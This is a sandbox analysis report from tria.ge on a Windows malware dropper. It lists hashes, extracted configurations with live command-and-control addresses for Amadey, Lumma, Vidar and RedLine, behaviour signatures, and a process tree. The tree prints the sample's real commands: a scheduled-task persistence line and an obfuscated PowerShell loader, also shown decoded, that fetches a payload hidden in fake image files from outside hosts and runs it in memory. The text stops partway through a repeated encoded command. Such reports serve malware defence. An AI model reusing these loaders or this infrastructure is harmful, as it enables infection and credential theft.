Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    106s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20250207-en
  • resource tags

    arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system
  • submitted
    08/03/2025, 15:45

General

  • Target

    fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe

  • Size

    1.8MB

  • MD5

    e74b537fdba9af9c83579432d7107627

  • SHA1

    5127e6d77e38aca75a65f529444f719121b49416

  • SHA256

    fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6

  • SHA512

    2dec46234f2766f7c2ac7a3b958a15724f3d3fe79d3fd19b027755a75dabb8bc338e9f70bf3e4d9387cb1d4df7ffc1b453caf58d65697d4792454b912c5b581d

  • SSDEEP

    49152:9iaa2xk0sV9LEstt/P8LA6XL2DGlf2XKZY:c2OR3EsH/kLA02SeXKa

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://begindecafer.world/api

https://9garagedrootz.top/api

https://modelshiverd.icu/api

https://arisechairedd.shop/api

https://catterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://ksterpickced.digital/api

https://dawtastream.bet/api

https://foresctwhispers.top/api

https://tracnquilforest.life/api

https://xcollapimga.fun/api

https://strawpeasaen.fun/api

https://jquietswtreams.life/api

https://starrynsightsky.icu/api

https://earthsymphzony.today/api

https://zfurrycomp.top/api

https://garagedrootz.top/api

https://larisechairedd.shop/api

https://sterpickced.digital/api

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

redline

Botnet

Build 7

C2

101.99.92.190:40919

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 1 IoCs
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Sectoprat family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 14 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 25 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 62 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 12 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 10 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 57 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 3 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1196
      • C:\Users\Admin\AppData\Local\Temp\fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe
        "C:\Users\Admin\AppData\Local\Temp\fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2336
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2720
          • C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe
            "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2988
          • C:\Users\Admin\AppData\Local\Temp\10142170101\4189e09c15.exe
            "C:\Users\Admin\AppData\Local\Temp\10142170101\4189e09c15.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:848
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 1200
              5⤵
              • Loads dropped DLL
              • Program crash
              PID:596
          • C:\Users\Admin\AppData\Local\Temp\10142180101\4jblLC1.exe
            "C:\Users\Admin\AppData\Local\Temp\10142180101\4jblLC1.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2028
            • C:\ProgramData\WMIsys\CONAtdrive.exe
              "C:\ProgramData\WMIsys\CONAtdrive.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious use of WriteProcessMemory
              PID:1652
              • C:\Windows\SysWOW64\schtasks.exe
                "schtasks.exe" /create /tn WMIsys /tr "C:\ProgramData\WMIsys\CONAtdrive.exe" /st 15:46 /du 23:59 /sc daily /ri 1 /f
                6⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2532
          • C:\Users\Admin\AppData\Local\Temp\10142200101\2cd9a90288.exe
            "C:\Users\Admin\AppData\Local\Temp\10142200101\2cd9a90288.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:936
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              5⤵
              • Downloads MZ/PE file
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2444
          • C:\Users\Admin\AppData\Local\Temp\10142210101\0102b962a1.exe
            "C:\Users\Admin\AppData\Local\Temp\10142210101\0102b962a1.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2324
          • C:\Users\Admin\AppData\Local\Temp\10142220101\516d293752.exe
            "C:\Users\Admin\AppData\Local\Temp\10142220101\516d293752.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2468
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              5⤵
              • Downloads MZ/PE file
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1780
          • C:\Users\Admin\AppData\Local\Temp\10142230101\3a084e6b3d.exe
            "C:\Users\Admin\AppData\Local\Temp\10142230101\3a084e6b3d.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1760
            • C:\Users\Admin\AppData\Local\Temp\10142230101\3a084e6b3d.exe
              "C:\Users\Admin\AppData\Local\Temp\10142230101\3a084e6b3d.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              PID:1708
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 1020
                6⤵
                • Loads dropped DLL
                • Program crash
                PID:2792
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 500
              5⤵
              • Loads dropped DLL
              • Program crash
              PID:1764
          • C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe
            "C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            PID:2584
            • C:\Windows\system32\cmd.exe
              cmd.exe /c 67cc62a429f2f.vbs
              5⤵
                PID:1528
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"
                  6⤵
                    PID:2684
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                      7⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2804
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                        8⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2648
              • C:\Users\Admin\AppData\Local\Temp\10142260101\m4mrV1B.exe
                "C:\Users\Admin\AppData\Local\Temp\10142260101\m4mrV1B.exe"
                4⤵
                • Executes dropped EXE
                • Adds Run key to start application
                PID:844
                • C:\Windows\system32\cmd.exe
                  cmd.exe /c 67cc62a429f2f.vbs
                  5⤵
                    PID:3008
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\67cc62a429f2f.vbs"
                      6⤵
                        PID:1500
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bg